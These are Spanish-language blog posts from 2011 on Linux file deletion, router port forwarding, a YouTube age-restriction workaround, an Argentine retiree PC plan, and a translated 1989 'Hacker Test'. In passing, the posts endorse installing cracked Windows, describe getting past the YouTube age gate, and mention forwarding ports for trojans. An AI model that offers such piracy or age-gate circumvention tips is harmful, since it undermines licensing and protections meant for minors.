x supuesto hoy dia yo seguiria teniendo problemas... segun los standares seria demasiado tecnofilo. para mi uso practicamente diario tengo 3 pcs de escritorio, una notebook, smartphone y una pocketpc. en realidad es mas o menos lo mismo q tengo siempre pero q x supuesto va evolucionando. lo bueno es q mi problema de tecnofilia no incluye la necesidad de tener lo ultimo, sino q me gusta usar las cosas mientras sigan sirviendo. no necesito un i7 para navegar x internet, raramente uso mi maquina mas poderosa para las cosas q puedo hacer con la notebook o el celu.

obviamente esas maquinas necesitan interconexion entre ellas, salida y acceso desde/hacia el exterior, x lo menos una estar online 24/7 y las otras con la posibilidad de encenderlas remotamente (x cualquier cosa). llegue a tener camaras con movimiento (todo 100% casero) q podia ver hasta en el celu cuando estaba fuera... y no eran los celus ni las cams de ahora... xD

seguramente muchos pensaran q soy un adicto pero son solo puntos de vista... mirense a uds mismos dentro de un par de años xD

conclusion

el mundo esta cambiando, las grandes empresas venden conectividad, conectividad con gente, con maquinas, con informacion, con lo q sea. no importa si lo necesitan o no, las necesidades se crean. todos tienen q estar conectados para ser cool y todos tienen q entender la tecnologia para no ser analfabetos informaticos.

lo q antes no le interesaba a nadie ahora fascina a todos, montones de "expertos" con "5 o 10 años? de experiencia con computadoras" hablan como si las hubieran inventado xq saben instalar windows o cambiar una placa de video... solo para parecer "kewl"...

el niño geek q se pasaba dias sentado en la compu hace 20 años hoy crea o administra sistemas gracias a su adiccion pero el q se la pasa hoy sentado en las redes sociales no creo q administre ni su propia vida en el futuro.

todavia es temprano para decir si es buena o mala tanta interconexion, a muchos seguramente los afectara en el mediano plazo ya q es obvio q no estan preparados para asimilar la red y sus posibilidades... carne para los psicologos. de lo q si estoy seguro es q la tecnofilia llego para quedarse hasta las ultimas consecuencias... solo espero q no acabemos como en terminator... je

/bin/rm: Argument list too long - Como solucionarlo.

2011-09-28T20:43:00.010-03:00

hoy me volvi a encontrar con este problema y me decidi a escibir una entrada para los q se lo encuentran x 1era vez... la 1era vez suele ser traumatica... xD

uno de los servers en los q trabajo esta todo el tiempo bajando datos q almacena en un directorio del sistema generando una gran cantidad de archivos q se van acumulando bastante rapido. dado q no uso personalmente los datos y no tengo muy claro hasta cuando sirven, suelo dejar q se acumulen hasta q el espacio en disco empieza a escasear y ahi es cuando viene el problema. la cantidad de archivos es tan grande q al intentar algo tan simple como un rm *.* la consola me devuelve:

/bin/rm: Argument list too long

el problema

como decia antes suele ser bastante traumatico encontrarse con q no se puede hacer algo tan basico como borrar archivos. buscando tanto la solucion como la causa me encontre con la interesante explicacion de que no es un problema del comando en si sino del kernel de linux.

traduccion de la debian wiki:

el limite afecta la funcion execve() del kernel, q es usada x todas las otras funciones exec() (execl, execlp, execle,etc). La funcion trabaja creando un buffer de 128k al final del espacio de memoria y copiando el comando y el entorno para el nuevo proceso en este espacio. entonces el kernel carga el nuevo programa en memoria, setea sus punteros argv y endv, y salta al punto de entrada del programa. El mensaje de error "argument list too long" es causado por el codigo de error !E2BIG, siendo devuelto por la funcion execve(), cuando es incapaz de introducir el argumento y entorno suministrados dentro del buffer de 128k.

x suerte el usuario normal no tiene q luchar normalmente con directorios q contienen tantos archivos... entonces me dio curiosidad de ver de cuantos archivos hablamos en realidad (mientras escribo esto voy haciendo el proceso), entonces meto en la consola:

# ls | wc -l

... y despues de un buen rato me devuelve... 1146724!!

la solucion

para poder borrar los archivos lo q tenemos q hacer es pasarselos a rm como argumento de a poco usando xargs. la linea q recomienda la misma debian wiki es esta:

find ./ -name '*' -print0 | xargs -0 -n 10 rm

hacemos un find de todos los archivos (*) y x medio de xargs se los vamos pasando a rm de a 10 (-n 10). el "-print0" en find y el -0 en xargs son para no tener problemas con los espacios en blanco de los archivos si es q los tienen, sino se pueden eliminar.

hay otras soluciones posibles como ls | xargs rm o ir borrando x partes pero la anterior es la mas simple y efectiva.

Port Forwarding - Como "abrir" puertos en cualquier router.

2011-09-19T18:16:00.024-03:00

una de las preguntas de redes mas vistas en internet es "como abro mis puertos?", el proceso es bastante facil, pero el usuario q se encuentra x 1era vez con este tema puede llegar a tener problemas, no solo por el proceso en si, sino xq la mayoria de las veces no tiene idea de lo q esta haciendo. la masificacion del uso de routers en los ultimos años, dado el aumento de LANs (Local Area Network o "redes caseras"), trajo este "problema" q no existia (ni existe hoy dia) con los modems.

todos los routers tienen diferentes menus de configuracion pero el contenido es siempre mas o menos igual aunque no este en el mismo lugar exacto... solo hay q buscar un poco. esta guia es gral y sirve para cualquier marca/modelo, el nivel es practicamente 0 asi q todos lo van a entender. los conceptos de red obviamente son los mismos para cualquier dispositivo y la intencion final es q sepan lo q estan haciendo al "forwardear" (no "abrir") un puerto... ademas de aprender a hacerlo x supuesto.

para informacion mas detallada sobre los menus de configuracion de cada router existen varias paginas, de las cuales la q encuentro mas completa es:

http://portforward.com/

se puede elegir marca/modelo y siguiendo los pasos tambien el servicio a configurar.

q es un puerto?

un puerto logico, q es del q hablamos, puede ser considerado como una via de comunicacion entre dos programas, q normalmente estan en dos maquinas distintas, pero no siempre es asi... aunque esto no viene al caso ahora.

un numero de puerto esta compuesto x un numero de 16bits, lo cual nos da un total de 65535 (hffff) puertos posibles. de estos los 1eros 1024 son considerados "puertos bajos" (o well-known-ports) y 1024-65535 "puertos altos". los bajos son los comunmente usados en los servicios mas conocidos, x ej:

21 FTP
22 SSH
23 TELNET
25 SMTP (envio de correo)
53 DNS
80 HTTP
110 POP3 (lectura de correo)
137-139 NETBIOS

se puede consultar la lista completa aca:

http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xml

hay muchos otros servicios considerados "normales" hoy dia q usan puertos mucho mas altos como el remote desktop de win x ejempo (3389), vnc (5900) o cualquier messenger o esas porquerias. a pesar de existir un standard, en la practica se puede hacer correr un servicio en cualquier puerto, lo cual muchas veces es util para ocultarlo un poco.

ya sabemos entonces q un puerto es un acceso para comunicacion, q es identificado por un numero y que necesitamos dos partes para establecer la conexion. en estas dos partes esta la mayor parte de la confusion de la mayoria... una parte es el servidor y la otra es el cliente. el servidor, como su nombre lo indica es el q ofrece el servicio y el cliente el q lo solicita. cuando abrimos una pagina web, la maquina donde se aloja corre el servidor en su puerto 80 y la nuestra se conecta x medio del cliente (el navegador) a traves de un puerto aleatorio estableciendo la conexion.

al mismo tiempo, el mismo servidor puede estar corriendo FTP y podriamos conectar a el x el puerto 21 y asi con el resto de los puertos/servicios. todo esto parece no tener mucha relacion para abrir puertos para un troyano o el emule pero la teoria es la misma asi q sigan leyendo...

el router

este maravilloso aparato nos permite compartir la conexion entre las maquinas de nuestra red hogareña x medio del protocolo NAT (Network Adress Translation), haciendo q todas esten conectadas a internet... salvo x el pequeño detalle de las aplicaciones q necesitan sus puertos expuestos al exterior...

no voy a explicar lo q es una direccion ip (aca pueden leer algo... http://locvtvs.blogspot.com/2010/12/arpageddon-ipcalipsis-o-como-lo-quieran.html) ni lo q es nat... pero alcanza con saber q cada dispositivo conectado a una red debe tener una ip para identificarlo... y q dentro de esta direccion se encuentran contenidos los 65535 puertos. tenemos dos tipos de direcciones, publicas y privadas, las 1eras son las que se usan en internet y las 2das en una red local (la mayoria de las veces del rango 192.168.x.x). para saber nuestra ip publica podemos verla desde alguna pagina de internet como:

http://ip-adress.com

y para saber la interna basta con abrir una consola y poner "ipconfig" en windows o "ifconfig" en linux.

el problema x el cual tenemos q "forwardear" los puertos es q la unica direccion visible desde internet es la ip publica y esta la tiene el router, q es el dispositivo q en realidad esta conectado, nosotros estamos "detras" de el y tenemos una direccion q solo es visible para las maquinas de nuestra red (y el mismo router). en lo q se refiere a "salir" hacia el exterior no tiene diferencia para lo q nos interesa, pero cuando se requiere q la otra aplicacion conecte con nuestra maquina se encuentra con el obstaculo del router ya que el puerto esta en el (ip publica), y no en nuestra maquina.

q es lo q hacemos entonces? redirigirlo hacia nuestra ip privada x supuesto...

port forwarding

en realidad el termino "abrir un puerto" es una mala traduccion de "forward a port" o el mas conocido "port forwarding" q en este caso en particular podria ser traducido como "reenviar un puerto" o "redireccionarlo".

con este proceso hacemos q cuando una aplicacion exterior busca X puerto lo haga en la maquina q queremos nosotros y no en el router, imaginense un tunel q conecta el puerto del router al correspondiente en la pc server. supongamos q queremos instalar un servidor web y q sea visible desde internet, instalamos y configuramos la ultima version de apache (o el q les guste), checkeamos antes q nada q funcione localmente poniendo 127.0.0.1 (localhost) en nuestro navegador, averiguamos la ip de la maquina (ipconfig/ifconfig) y vamos a la configuracion el router.

al router se puede ingresar x el navegador o x telnet en muchos casos, el navegador es mas facil asi q solo hay q abrirlo y poner la ip del router... cual es la ip del router??.. je

en win, haciendo el famoso "ipconfig", es la ip q sale en "puerta de enlace" o "gateway". en linux con "route -n".

una vez en la pagina del router va a pedir una pass q me imagino q la tienen o sino fijense en alguna lista de default passwords con la marca/modelo del router. si la cambiaron lo resetean y vuelve a esa misma pass. aca hay una lista bastante completa:

http://www.phenoelit-us.org/dpl/dpl.html

una vez dentro, todos (si... TODOS) los routers tienen un apartado de port forwarding, puede estar bajo muchos nombres pero el formato es siempre:

nombre de la regla
direccion ip de destino
puerto publico
puerto privado
protocolo

puede tener alguno mas pero estos son los necesarios para hacer el forward.


Menu de configuracion en Linksys

nombre de la regla: es solo una etiqueta, le pueden poner el nombre q quieran... seria bueno ponerle uno q recuerde lo q hace... ;)

direccion ip de destino: es la direccion de la maquina en la red interna a la cual queremos redirigir el puerto.

puerto publico: el puerto del router q queremos redirigir (x ej el 80 en el caso de un servidor web)

puerto privado: el puerto en la maquina. x lo gral ponemos el mismo q el publico pero se pueden llegar a crear reglas mas avanzadas redirigiendo un puerto a otro. x ejemplo podemos hacer q el servidor web corra en el puerto 30000 localmente, en ese caso pondriamos 30000 en este campo y el 80 seria redirigido a este de manera transparente para el cliente q conecta desde internet... para este la conexion seria normal, al 80.

protocolo (tcp/udp/both): tcp y udp son protocolos de transporte de datos, son los q llevan la informacion de un puerto a otro. para hacerlo rapido, las aplicaciones para las cuales queremos abrir puertos pueden usar tcp, udp o ambos, x lo gral en las instrucciones del soft se indica cual se debe abrir y sino funciona simplemente prueben con both (ambos).


Menu de configuracion en DLink

explicando un poco mejor la diferencia, tcp (Transmission Control Protocol) es el mas usado ya que posee control de flujo, el cual facilita la correccion de errores. cuando un paquete es enviado corre peligro de sufrir una colision, la cual haria q no llegue a destino, en ese caso el cliente vuelve a pedir el paquete al server hasta tener la informacion completa.


Menu de configuracion en 3com

udp (User Datagram Protocol) es mas usado x aplicaciones de streaming, asi tambien como troyanos y ataques DoS entre otras cosas, en resumen nada q requiera 100% de fiabilidad en los datos. lo q si ofrece udp es mucha velocidad, al no tener q preocuparse de checkear y reenviar paquetes.

caso practico

vamos a suponer ahora q queremos instalar un server de ftp en nuestra pc y q sea accesible desde internet mientras estamos en nuestra red local, detras de un router.

sabemos q el sevicio ftp usa el puerto 21, x lo tanto ese es el q tenemos q forwardear (o "abrir" hablando mal). abrimos una consola y con ipconfig vemos nuestra ip y la del router como explique mas arriba. vamos a suponer entonces q nuestra ip es 192.168.1.51 y la del router 192.168.1.1.

abrimos el navegador y le ponemos la ip del router (192.168.1.1), nos lleva a la pantalla de logueo donde ingresamos user/pass. una vez dentro buscamos el menu de forwarding y creamos una nueva regla:

nombre: FTP (o lo q quieran)
direccion ip: 192.168.1.51 (la de la pc q corre el server ftp)
puerto exterior: 21 (puede aparecer como "external", "public", "start" o algunas otras)
puerto interior: 21 (tambien puede salir con otro nombre o en otros casos como en algunos tp-link no aparecer)
protocolo: TCP (el FTP usa solamente TCP, poniendo "both" funcionaria igual pero... para q abrir algo q no vamos a usar?)

guardar la configuracion y el server ya deberia ser accesible desde internet. cambiando direcciones ip y puertos x los adecuados, el mismo proceso sirve para cualquier aplicacion, ya sea p2p, juegos online, troyanos o un server como el del ejemplo.

firewall, dmz y algunos otros conceptos

ademas de forwardear el puerto debemos, ahora si, "abrirlo" en el/los firewall q esten en la red. seria muy largo explicar lo q es un firewall y creo q el q lee esto, tratando de forwardear puertos, ya sabe lo q es. obviamente si el puerto esta forwardeado pero cerrado en el firewall nunca se va a establecer la conexion, asi q hay q abrirlo en el q usemos en nuestro sistema (firewall de xp, iptables, algun av o lo q sea) y si hay otro firewall en el router o cualquier otro dispositivo q se encuentre entre nosotros y el exterior hacer lo mismo en este.

la opcion DMZ (De Militarized Zone) o "zona desmilitarizada" sirve para exponer todos los puertos de un dispositivo hacia el exterior como si estuviera conectado a un simple modem. si activamos esta opcion no tenemos q preocuparnos de forwardear nada ya q todo esta abierto al exterior... de lo q si tenemos q preocuparnos es de tanta exposicion, esta opcion no es para nada segura y no recomiendo usarla salvo para propositos de testeo o bien q sepan lo q estan haciendo.

Como ver videos prohibidos de Youtube.

2011-08-07T20:49:00.007-03:00

hace un tiempo youtube restringe el acceso a ciertos videos por "contenido inapropiado", si andan cada tanto x ahi se habran encontrado seguramente con alguno de ellos. El mensaje q muestran es algo asi:

This video or group may contain content that is inappropriate for some users.

To view this video or group, please verify that you are of the appropriate age by signing in or signing up....

algunos de estos videos son asi catalogados por el uploader y otros simplemente xq los denuncian como inapropiados. de todas formas no es tan dificil verlos ya q solo hay q hacerse una cuenta en youtube y al ingresar a la url del video "inapropiado" nos sale el tipico boton para declarar q somos mayores de 18 (aunque tengan 10) y se puede ver normalmente pero... para q perder tiempo creando una cuenta solo para ver un video? termina siendo muy parecido a la tactica de los admins de foros q ocultan sus links:

como ver links ocultos en foros smf

sumemos usuarios, no importa si en la vida no vuelven a entrar, solo por las estadisticas.

seguramente diran q es para proteger a los menores de contenido inapropiado, pero cualquier "menor" de hoy sabe bastante mas q el comun de los "mayores" y seguramente sabe como buscar en san google para llegar a esta pagina y aprender a hacer algo tan simple... o aun mejor, llegar a la misma conclusion q yo y averiguarlo x si mismo q no es tan dificil. si de verdad quieren proteger a alguien mejor q se esfuercen un poco mas.

el "metodo"... xD

todo esto empezo xq queria comprarme una rana "pacman" albina, se llaman asi xq son muy parecidas al famoso pacman. es un bicho bastante agresivo q come alimento vivo, cuando son pequeñas grillos, zophobas o tenebrios (una especie de gusanos) y cuando se ponen mas grandes se la puede alimentar con pequeños ratones como a cualquier especie de serpiente grande.

emmm... si... soy aficionado a los "bichos", pero como este es un blog de tecnologia volvamos al tema... buscando videos de la rana mandandose algun ratoncito me encuentro con este:

http://www.youtube.com/watch?v=2ZV11o_2oTU

en el cual me salio el famoso mensaje. tengo un par de cuentas en youtube y no me costaba nada loguearme pero la verdad q no me gusta q me obliguen, como tampoco me gusta q quede registro de lo q miro o no con mi usuario, lo uso solamente para subir videos y muy de vez en cuando.

entonces me acorde del viejo truco de sacar el "watch" en la url para ir directamente al video y... vaya sorpresa (o no tanto)... funciono. me dejo verlo sin loguear, registrar ni nada de eso. entonces... lo unico q hay q hacer es modificar la url y dejarla asi:

http://www.youtube.com/v/2ZV11o_2oTU

ahora si podemos ver a la linda ranita comerse al ratoncito... impresionables abstenerse ;)

Plan de Computadoras para Jubilados y Pensionados - Porque no sirve...

2011-07-03T14:46:00.010-03:00

lanza el gobierno otro de sus famosos planes para q todos tengan su pc, y les toca otra vez a los pobres jubilados (se ve q es mas facil sacarles $$$). otra vez me vi obligado a checkear las ofertas xq siempre hay algun conocido q pregunta para algun pariente o muchas veces para si mismo tratando de aprovechar las cuotas y el supuesto ahorro en el precio.

la verdad es q no tengo idea como licita el gobierno este proceso, no tengo idea (ni me interesa) de politica y no tengo interes particular en todo esto x lo q creo q mi opinion es lo bastante imparcial como para q valga la pena... de lo q si tengo bastante idea es de maquinas, precios y todas esas cosas y lo q si puedo asegurar es q no le recomendaria a nadie meterse en uno de esos planes.

los planes se otorgan x medio del bco nacion, la anses y las empresas q "participan actualmente". la mas conocida es hp q siempre anda en todas las cosas raras, exo q estuvo metida en la famosa movida de las netbooks para las escuelas (mejor ni hablar) y olivetti. de estas ultimas no tuve el placer de ver ningun desktop, pero si son como las notebooks mejor ni las comento xq es de lo peorcito q anda dando vueltas. mal diseño, mal ensambladas... malas.

en resumen... se obtiene un prestamo para comprar alguna de las maquinas q nos ofrecen, q seguramente no seria una de las q comprariamos si pudieramos elegir. no recomendaria a nadie comprar una maquina en exo, asi como no recomendaria comprar una de esas "commodore" de garbarino x ejemplo. tampoco recomendaria a un jubilado comprar alguno de los modelos q ofrece hp, y menos todavia algo de olivetti.

lo mejor seria poder sacar un credito y cada uno comprar donde quiera la maquina q se le ocurra. despues q tenga q demostrar q gasto el dinero en eso o lo q sea, no creo q sea tan dificil... o tal vez lo sea, pero seria tambien mucho mas transparente. aunque seguramente unos cuantos se estarian perdiendo algunos millones si se hiciera asi...

en fin... politica... ;)

veamos para empezar la 1er oferta de hp. una compaq aio (all in one) de esas copiadas de las imac. todo en el "monitor"... bien dificil de desarmar y reemplazar partes, lo q es lo mismo q decir "caro cuando se rompa". es raro q todas las ofrecidas sean aio, debe ser q no se las pueden vender a nadie.

la maquina en cuestion es la Compaq Presario CQ1-1307 AiO con un precio de 2699$ argentinos, no es caro y no es barato, es lo mismo q vale en ml o en cualquier negocio de electrodomesticos. el 1er pensamiento es... "pero es en 40 cuotas", pero vale la pena estar pagando 40 cuotas de semejante porqueria? veamos las especificaciones:

Procesador Intel® Atom™ Dual Core D510.

Windows® 7 Starter Original*.

Memoria de 2GB DDR2.

Disco Duro de 500GB 7200RPM SATA - 3G

Pantalla LCD ancha HD de 18,5".

Cámara web y micrófono integrados.

Tarjeta gráfica integrada Intel® GMA 3150.

Grabadora de DVD SuperMulti de bandeja delgada con tecnología LightScribe.

Lector de tarjetas de memoria 6 en 1.

Red inalámbrica 802.11b/g/n.

procesador atom. el d510 corre a 1.66ghz pero... pero... se calcula q un atom tiene la mitad del poder de proceso q un viejito pentium M, o sea q tenemos un dual core pero corriendo a la velocidad del procesador de nuestro smartphone (o menos segun el modelo xD).

memoria 2gb ddr2 (!). si, hp sigue vendiendo desktops con memoria ddr2 xD. de todas formas no se preocupen mucho x ampliarla si no cambian la version de windows ya q el starter no soporta mas de 2gb... ahhh y solo hay version de 32 bits... y tampoco se puede:

crear grupos de trabajo

usar multiples monitores

cambio rapido de usuarios

cambiar el fondo de pantalla

aero

multi-touch

escritorio remoto

unirse a dominios

modo xp

etc, etc, etc.

x supuesto q estamos en argentina, el pais de la pirateria. hasta el hijo de 12 años del vecino de al lado puede instalar un windows "trucho" pero... alguien penso q en el precio los pobres jubilados pagan esa licencia? una licencia con la q no pueden poner el fondo de pantalla del perro si tienen ganas? obvio q van al vecino y le dicen al hijo q le ponga el win crackeado... y les queda de adorno el blister de la licencia... ;)

disco de 500gb 7200rpm, dvdrw con lightscribe, grafica integrada (q no debe correr ni el doom) y todos esos accesorios baratos como la cam, mic, lector de mems, etc

puede no parecer caro desde la optica de alguien no muy entendido, pero en realidad es una porqueria al precio de un desktop "clon" 10 veces mas potente.

pero bueno... aunque sea es "linda"... xD

exo

si lo de hp puede llegar a parecer tal vez "engañoso" lo de exo es casi increible. vamos a ver la mas barata:

Intel® Atom™ 425

Memoria 2 Gigabytes

Disco de 320GB SATA 2

Grabadora de DVD/CD Dual Layer

Red 10/100 MB Ethernet

Teclado Multimedia USB

MS Office starter 2010

Windows 7® Starter Edition Original

Antivirus ESET NOD32

Google Earth

Cursos autoestudio de manejo de PC e internet, Correo electrónico y Redes Sociales

Monitor Color LCD 15" Wide

Entrega a domicilio sin Cargo en todo el país

como se puede ver es en todo inferior a la de hp, salvo por la memoria q dice "2gb" pero no se sabe si son ddr2, 3, 1, o simms de 30 pines. y seguimos con los famosos atom...

aca podemos ver algunos tests de benchmark de un atom contra un viejo pentium 4. el atom q mas puntua tiene 2 cores contra 1 de los p4 y aun asi el p4 lo supera en muchos tests:

atom d510 vs P4

estamos hablando de micros q tienen casi 10 años contra los "modernos" atom. la pc vieja q esta tirada en algun armario es mas rapida q esta maquina.

en este caso, todo esto metido en un gabinete normal con un moni de 15, teclado, mouse y parlantes de kit.

ni siquiera es "linda"... xD

ahhh... trae "google earth". si alguna vez se les llega a borrar lo descargan de aca y listo:

http://www.google.com/earth/download/ge/agree.html

y x supuesto cursos de autoestudio q deben estar buenisimos, seguro q eso vale la diferencia de precio. ahhh el precio? 2499$!!!

increible!!

las mas caras

las de major precio seguramente no iran a parar a las manos del jubilado sino de algun nieto (o hijo) q vio la forma de conseguirse una pc nueva. a todos ellos les digo... "no es una buena idea"...

la mas cara de hp es la HP TouchSmart 310-1110 con un valor de 5299$, la voy a dejar de lado xq no me imagino al jubilado con el touch screen. me parece exagerado, el q quiere tanto lujo ya no es por ninguna necesidad. se termina pagando mucho el touch en una pc no tan poderosa... no tiene sentido.

la q sigue entonces (no touch screen) es la HP Omni 200-5330:

Procesador Intel® Core™ i3-550.

Windows® 7 Home Basic Original*.

Memoria de 2GB DDR3.

Disco Duro de 500GB SATA - 3G.

Pantalla LCD ancha Full HD de 21,5".

Grabadora de DVD SuperMulti de bandeja delgada.

Tarjeta gráfica integrada Intel® HD Graphics.

Cámara web y micrófono integrado.

Red inalámbrica 802.11b/g/n.

Lector de tarjetas de memoria 6 en 1.

precio? 4999$!!!!!!!! (pero tambien es "linda")

la mas cara de exo:

Procesador Intel® Core™ i5-2300 Segunda Generación

Chipset Intel® H61

Disco 1TB SATA 2

Memoria 4 Gigabytes DDR3 hasta 16GB

Grabadora de DVD/CD Dual Layer

Lector múltiple de Memorias

LAN 1Gb

Video Geforce 210 512MB + salidas DVI y HDMI

WIFI Wireless 802.11 b/g

Audio alta definición soporta 6 canales

Slot PCI Express 16x libre

12 Puertos USB 2.0

Ventilación Dual

Windows 7 ® Home Premium Original

MS Office starter 2010

Antivirus ESET NOD32

Google Earth

Cursos autoestudio de manejo de PC e internet, Correo electrónico y Redes Sociales

Monitor Color LCD 21,5" Wide 16:9 resolución Full HD 1920 X 1080

Entrega a domicilio sin Cargo en todo el país

esta un poco mas "arriba" q la de hp aunque tambien esta arriba en precio, 5599$. hay otra similar a la de hp x 4899$.

a los q las quieren para jugar de entrada eliminamos las hp xq ninguna tiene buen video y no se puede agregar una placa standard.

veamos la de exo... i5, "chipset intel"... el mobo puede ser cualquier cosa, 4gb mem (?), 1tb disco (recen x la marca) y bue... accesorios. es suficiente la maquina pero x supuesto no el video, no se si es onboard xq no lo dice pero igual con una 210 no van a ir muy lejos. tal vez gta 4 a minima resolucion sea lo maximo q puedan correr... demasiado poco x tantos $$.

x supuesto q para agregar una placa mas potente (entre 100 y 300usd) le van a tener q cambiar tambien la fuente (entre 70 y 150usd) xq seguramente venga con una generica q va a explotar en cuanto le conecten 2 usb a la vez.

o sea q en el caso del usuario exigente a esto le tendriamos q meter 450usd (casi 2000$) encima... una locura...

para el usuario "normal"... le preguntaria para q quiere tantos cores si tal vez ni sabe lo q son. pero suponiendo q si los necesite xq corre procesos pesadisimos, renderiza cosas, hace calculos con matlab o lo q sea, tambien vamos a acordar q no le hace falta (como tampoco al jubilado) una maquina "linda" sino una q haga lo q necesita, asi q volvemos a descartar las aio de hp.

lo razonable seria q la de exo fuera mas barata entonces... pero no, cuesta lo mismo q un aio de hp. xq? no lo se, no se entiende. tambien es para tener en consideracion q un OMNI 200 como el de hp se vende en ebay nuevo x menos de 600usd (la mitad).

para terminar, en el remoto caso de q sea para el jubilado, seria mejor la mas barata (q no sea atom) ya q no va necesitar 5 cores ni 4gb de memoria para nada q vaya a hacer en un futuro proximo, y como cuestan lo mismo seria mejor comprar la de hp obviamente. aunque seguro va a terminar pagando el doble q el clon armado en cualquier lado (de la misma calidad).

precios

q conviene entonces? obvio, comprar (o armar) un clon, meterle un win crackeado o muchisimo mejor un linux y si quieren pagarlo en cuotas igual q en el plan del gobierno. todo el mundo vende en cuotas, hasta el negocito de la esquina arma pcs y las vende en cuotas y seguro q va a terminar costando mas barata y siendo mucho mejor maquina si van con alguien de confianza.

no van a conseguir 40 pero... quien quiere 40 cuotas? cuando las terminen de pagar la maquina seguramente va a ser vieja y con esos componenetes tambien seguro q va a estar rota. las exo x componentes baratos y las hp xq lo q venden en argentina es todo "refurbished". como? muy sencillo... x ejemplo a un yankee se le rompe el mobo de una hp, la manda a arreglar, le ponen uno nuevo recien salido de fabrica y el viejo lo arreglan. adivinen adonde va a parar el "arreglado"? si si... a esas maquinas q estan comprando en la pagina de hp... je... todo al "3er mundo". pueden negar lo q quieran, pero no q no pueden negar son los puntos de soldadura a mano en equipos "nuevos". refurbished y al doble de lo q vale en usa... sin palabras...

ya no armo maquinas pero sigo conservando algunos proveedores de cuando lo hacia. algunos precios a jul/11:

combo micro i5 2300 con mobo intel DH67BLB3 --------> 400usd (menos en realidad)

mem 4gb g.skill (gaming series) --------------------> 60usd

hd 1tb wd green ------------------------------------> 80usd

algun case sentey "lindo" --------------------------> 70usd

dvdrw, lector mem, etc -----------------------------> 60usd (tal vez menos)

lcd 23" samsung P2370H -----------------------------> 330usd

cuanto suma? 1000usd... con el dolar a 4.14 pesos tenemos unos 4140$ armando con componentes de mucha mejor calidad. con los componentes de exo seguramente se puedan bajar unos 1000$... y no estamos hablando de precios mayoristas sino de los precios q maneja cualquier mortal.

la de hp, mas alla del tema "refurbished", puede ganar en el sentido del diseño pero no hay q olvidar q cuando se rompa algo no va a ser tan facil de reemplazar y con las cosas raras q viene haciendo hp ultimamente...

pueden leer estas entradas para enterarse mas:

HP y el calentamiento en notebooks

HP CarePacks al descubierto

conclusion

las mas baratas no sirven para nadie. al jubilado es darle una porqueria lenta con la q va a tener q luchar tanto q va a terminar pensando q "es muy dificil". al "pariente" le va a servir menos xq seguramente va a querer hacer mas cosas q el jubilado y no le va a alcanzar ni q le agregue memoria, disco o lo q sea. el atom es muy lindo para una netbook pero nada mas q eso.

las mas caras no llegan a tener la potencia o la posibilidad clara de upgrade para el perfil de un gamer o cualquier "power user". ademas un usuario de estas caracteristicas necesita algo mas personalizado y de calidad q seguramente va a terminar pagando a menor precio.

El Test Hacker - Version 1.0

2011-05-07T15:41:00.018-03:00

este "test" fue escrito en epocas prehistoricas cuando internet todavia no existia y tener acceso a una computadora era cosa de "unos pocos", tanto x el precio como x la dificultad para hacer las cosas mas basicas con ellas. si algo no funcionaba no se podia "googlear" y si querias aprender a programar o usar algun sistema raro te tenias q ir a comprar (o fotocopiar) algun libro o manual... q eran bastante dificiles de conseguir...

comparados con el usuario standard de hoy dia casi todos eran practicamente "hackers" en el concepto moderno, ya q era eso o dedicarte a otra cosa si querias hacer algo mas q poner un jueguito en una vieja commodore o spectrum.

volviendo al "test", data del año 1989 y fue publicado originalmente por nutworks q era un magazine electronico de humor difundido a traves de una lista de correo de bitnet y fue escrito por Felix Lee, John Hayes y Angela Thomas. me decidi a hacer la traduccion completa ya q no pude encontrar ninguna en castellano, salvo una vieja de jjf q tiene menos de la mitad y esta bastante mal hecha.

si bien la mayoria de las preguntas van a sonar a chino basico para los mas jovenes (seguro q ninguno hizo jamas un "flippy disk" xD), se puede ver el trasfondo, mas alla de la parte humoristica, de lo q era en esa epoca (y deberia ser hoy dia tambien salvando distancias) un hacker, sabiendo tanto de programacion como de electronica, telefonia, matematicas y x supuesto juegos de video, ademas de ser un obsesivo q se pasa la vida sentado detras de maquinas, libros y circuitos tratando de aprender todo lo q se le ponga delante... le sirva o no algun dia (todo sirve algun dia...)

con el paso del tiempo el termino quedo bastante bastardeado, incluyendo desde toda clase de criminales adaptados a la epoca moderna hasta niños robando claves de correo a sus amiguitos o defaceando webs con scripts ajenos. eso no es un hacker... es simplemente un criminal en el 1er caso y 1 niño jugando en el ultimo.

por otra parte tenemos tambien montones de cursos y certificaciones para ser "hacker", desde las q son un robo practicamente hasta las mas "serias" como la CEH q esta tan de moda. lo cierto es q el mejor de estos cursos puede llegar a crear un buen profesional de la seguridad pero no un verdadero "hacker"... una "certificacion" no te transforma en uno ;)

hice algunas aclaraciones en las preguntas q me parecian mas dificiles de entender. si hay algo q quieran saber dejen un comentario abajo y si se de q se trata (algunas se me escapan) lo pongo.

The Hacker Test - Version 1.0

puntuacion: suma un punto por cada item q hayas hecho o cada pregunta q puedas responder correctamente.

si tu puntuacion esta entre: vos sos:

0x000 and 0x010 -> analfabeto informatico

0x011 and 0x040 -> usuario

0x041 and 0x080 -> operador

0x081 and 0x0C0 -> nerd

0x0C1 and 0x100 -> hacker

0x101 and 0x180 -> guru

0x181 and 0x200 -> wizard

nota: si no entendes la puntuacion, para aca.

y ahora las preguntas...

0001 alguna vez usaste una pc?

0002 ... por mas de 4 horas seguidas?

0003 ... mas de 8 horas?

0004 ... mas de 16 horas?

0005 ... mas de 32 horas?

0006 alguna vez parchaste cinta de papel? --- (las q se usaban en los antiguos teletipos)

0007 alguna vez perdiste una clase x quedarte programando?

0008 ... perdiste un examen?

0009 ... perdiste una boda?

0010 ... perdiste tu propia boda?

0011 alguna vez programaste mientras estabas intoxicado?

0012 ... tenia sentido al otro dia?

0013 alguna vez escribiste un simulador de vuelo?

0014 alguna vez violaste la garantia de tu equipo?

0015 alguna vez cambiaste el valor de 4?

0016 ... sin intencion?

0017 ... en otro lenguaje q no sea fortran?

0018 usas DWIM para hacer la vida interesante?

0019 le pusiste nombre a una pc?

0020 te quejas cuando una "funcion" que usas se publica?

0021 comes slime-molds? --- (juego NetHack - 1987)

0022 sabes cuantos dias de edad tenes?

0023 alguna vez quisiste descargar una pizza?

0024 alguna vez inventaste un chiste de computadoras?

0025 ... alguien no lo entendio?

0026 podes recitar jabberwocky? --- (poema de lewis carrol)

0027 ... al reves?

0028 alguna vez viste "el pato donald en la tierra de matemagica"?

0029 viste "tron"?

0030 viste "wargames"?

0031 sabes lo q es ASCII?

0032 ... EBCDIC?

0033 podes leer y escribir ASCII en hexa u octal?

0034 sabes los nombres de todos los codigos de control ASCII?

0035 podes leer y escribir EBCDIC en hexa?

